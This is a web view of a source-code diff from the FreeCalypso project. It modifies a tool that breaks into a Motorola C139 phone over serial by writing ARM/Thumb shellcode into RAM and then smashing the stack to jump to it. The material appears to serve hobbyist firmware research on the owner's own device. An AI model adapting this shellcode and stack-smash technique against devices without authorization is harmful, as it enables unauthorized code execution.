FreeCalypso > hg > freecalypso-sw

comparison rvinterf/lowlevel/tfc139.c @ 983:7166c8311b0d

Find changesets by keywords (author, files, the commit message), revision number or hash, or revset expression.
tfc139 reworked to support both ARM and Thumb entry
author Mychaela Falconia <falcon@ivan.Harhan.ORG>
date Thu, 10 Dec 2015 08:07:47 +0000
parents 0d7cc054ef72
children 8c83777f856c
comparison
equal deleted inserted replaced
982:461f7ee5f254 983:7166c8311b0d
25 char *logfname; 25 char *logfname;
26 FILE *logF; 26 FILE *logF;
27 time_t logtime; 27 time_t logtime;
28 int no_output; /* for output.c */ 28 int no_output; /* for output.c */
29 29
30 int wakeup_after_sec = 7; 30 int wakeup_after_sec = 1;
31 31
32 /* see ../../target-utils/tf-breakin/payload.S for the source */ 32 /* see ../../target-utils/tf-breakin/payload.S for the source */
33 static u_char iram_payload[112] = { 33 static u_char shellcode[114] = {
34 0xD3, 0xF0, 0x21, 0xE3, 0x58, 0x10, 0x9F, 0xE5, 34 0x78, 0x47, 0xC0, 0x46, 0xD3, 0xF0, 0x21, 0xE3,
35 0xF5, 0x00, 0xA0, 0xE3, 0xB2, 0x00, 0xC1, 0xE1, 35 0x50, 0x10, 0x9F, 0xE5, 0xF5, 0x00, 0xA0, 0xE3,
36 0xA0, 0x00, 0xA0, 0xE3, 0xB2, 0x00, 0xC1, 0xE1, 36 0xB2, 0x00, 0xC1, 0xE1, 0xA0, 0x00, 0xA0, 0xE3,
37 0x48, 0x60, 0x9F, 0xE5, 0x05, 0x00, 0xD6, 0xE5, 37 0xB2, 0x00, 0xC1, 0xE1, 0x40, 0x60, 0x9F, 0xE5,
38 0x20, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A, 38 0x05, 0x00, 0xD6, 0xE5, 0x20, 0x00, 0x10, 0xE3,
39 0x2C, 0x10, 0x8F, 0xE2, 0x06, 0x20, 0xA0, 0xE3, 39 0xFC, 0xFF, 0xFF, 0x0A, 0x38, 0x10, 0x8F, 0xE2,
40 0x01, 0x00, 0xD1, 0xE4, 0x00, 0x00, 0xC6, 0xE5, 40 0x06, 0x20, 0xA0, 0xE3, 0x01, 0x00, 0xD1, 0xE4,
41 0x01, 0x20, 0x52, 0xE2, 0xFB, 0xFF, 0xFF, 0x1A, 41 0x00, 0x00, 0xC6, 0xE5, 0x01, 0x20, 0x52, 0xE2,
42 0x05, 0x00, 0xD6, 0xE5, 0x40, 0x00, 0x10, 0xE3, 42 0xFB, 0xFF, 0xFF, 0x1A, 0x05, 0x00, 0xD6, 0xE5,
43 0xFC, 0xFF, 0xFF, 0x0A, 0x18, 0x10, 0x9F, 0xE5, 43 0x40, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A,
44 0x01, 0x2C, 0xA0, 0xE3, 0xB0, 0x20, 0xC1, 0xE1, 44 0x10, 0x10, 0x9F, 0xE5, 0x01, 0x2C, 0xA0, 0xE3,
45 0x00, 0xF0, 0xA0, 0xE3, 0x02, 0x02, 0x02, 0x4F, 45 0xB0, 0x20, 0xC1, 0xE1, 0x00, 0xF0, 0xA0, 0xE3,
46 0x4B, 0x02, 0x00, 0x00, 0x02, 0xF8, 0xFF, 0xFF, 46 0x02, 0xF8, 0xFF, 0xFF, 0x00, 0x58, 0xFF, 0xFF,
47 0x00, 0x58, 0xFF, 0xFF, 0x10, 0xFB, 0xFF, 0xFF 47 0x10, 0xFB, 0xFF, 0xFF, 0x02, 0x02, 0x02, 0x4F,
48 0x4B, 0x02
48 }; 49 };
49 50
50 static unsigned iram_load_addr = 0x800000; 51 static unsigned shellcode_load_addr = 0x800000;
51 static unsigned stack_smash_addr = 0x837C54; 52 static unsigned stack_smash_addr = 0x837C54;
53 static int thumb_entry = 0;
52 54
53 static u_char stack_smash_payload[4]; 55 static u_char stack_smash_payload[4];
54 56
55 static char *target_tty_port; 57 static char *target_tty_port;
56 58
75 csum ^= pkt[i]; 77 csum ^= pkt[i];
76 pkt[i] = csum; 78 pkt[i] = csum;
77 send_pkt_to_target(pkt, i + 1); 79 send_pkt_to_target(pkt, i + 1);
78 } 80 }
79 81
82 static void
83 build_stack_smash_payload()
84 {
85 unsigned jump_addr;
86
87 jump_addr = shellcode_load_addr;
88 if (thumb_entry)
89 jump_addr += 1;
90 else
91 jump_addr += 4;
92 stack_smash_payload[0] = jump_addr;
93 stack_smash_payload[1] = jump_addr >> 8;
94 stack_smash_payload[2] = jump_addr >> 16;
95 stack_smash_payload[3] = jump_addr >> 24;
96 }
97
80 main(argc, argv) 98 main(argc, argv)
81 char **argv; 99 char **argv;
82 { 100 {
83 extern char *optarg; 101 extern char *optarg;
84 extern int optind; 102 extern int optind;
85 int c; 103 int c;
86 fd_set fds; 104 fd_set fds;
87 105
88 baudrate_name = "57600"; /* what C139 firmware uses */ 106 baudrate_name = "57600"; /* what C139 firmware uses */
89 while ((c = getopt(argc, argv, "a:B:l:s:w:")) != EOF) 107 while ((c = getopt(argc, argv, "a:B:l:s:tw:")) != EOF)
90 switch (c) { 108 switch (c) {
91 case 'a': 109 case 'a':
92 iram_load_addr = strtoul(optarg, 0, 16); 110 shellcode_load_addr = strtoul(optarg, 0, 16);
93 continue; 111 continue;
94 case 'B': 112 case 'B':
95 baudrate_name = optarg; 113 baudrate_name = optarg;
96 continue; 114 continue;
97 case 'l': 115 case 'l':
98 logfname = optarg; 116 logfname = optarg;
99 continue; 117 continue;
100 case 's': 118 case 's':
101 stack_smash_addr = strtoul(optarg, 0, 16); 119 stack_smash_addr = strtoul(optarg, 0, 16);
120 continue;
121 case 't':
122 thumb_entry = 1;
102 continue; 123 continue;
103 case 'w': 124 case 'w':
104 wakeup_after_sec = strtoul(optarg, 0, 0); 125 wakeup_after_sec = strtoul(optarg, 0, 0);
105 continue; 126 continue;
106 case '?': 127 case '?':
124 } 145 }
125 setlinebuf(logF); 146 setlinebuf(logF);
126 fprintf(logF, "*** Log of TFC139 break-in session ***\n"); 147 fprintf(logF, "*** Log of TFC139 break-in session ***\n");
127 } 148 }
128 time(&logtime); 149 time(&logtime);
129 output_line("Sending IRAM payload"); 150 output_line("Sending shellcode RAM write");
130 send_compal_memwrite(iram_load_addr, iram_payload, sizeof iram_payload); 151 send_compal_memwrite(shellcode_load_addr, shellcode, sizeof shellcode);
131 stack_smash_payload[0] = iram_load_addr; 152 build_stack_smash_payload();
132 stack_smash_payload[1] = iram_load_addr >> 8;
133 stack_smash_payload[2] = iram_load_addr >> 16;
134 stack_smash_payload[3] = iram_load_addr >> 24;
135 for (;;) { 153 for (;;) {
136 FD_ZERO(&fds); 154 FD_ZERO(&fds);
137 FD_SET(target_fd, &fds); 155 FD_SET(target_fd, &fds);
138 c = select(target_fd+1, &fds, 0, 0, 0); 156 c = select(target_fd+1, &fds, 0, 0, 0);
139 time(&logtime); 157 time(&logtime);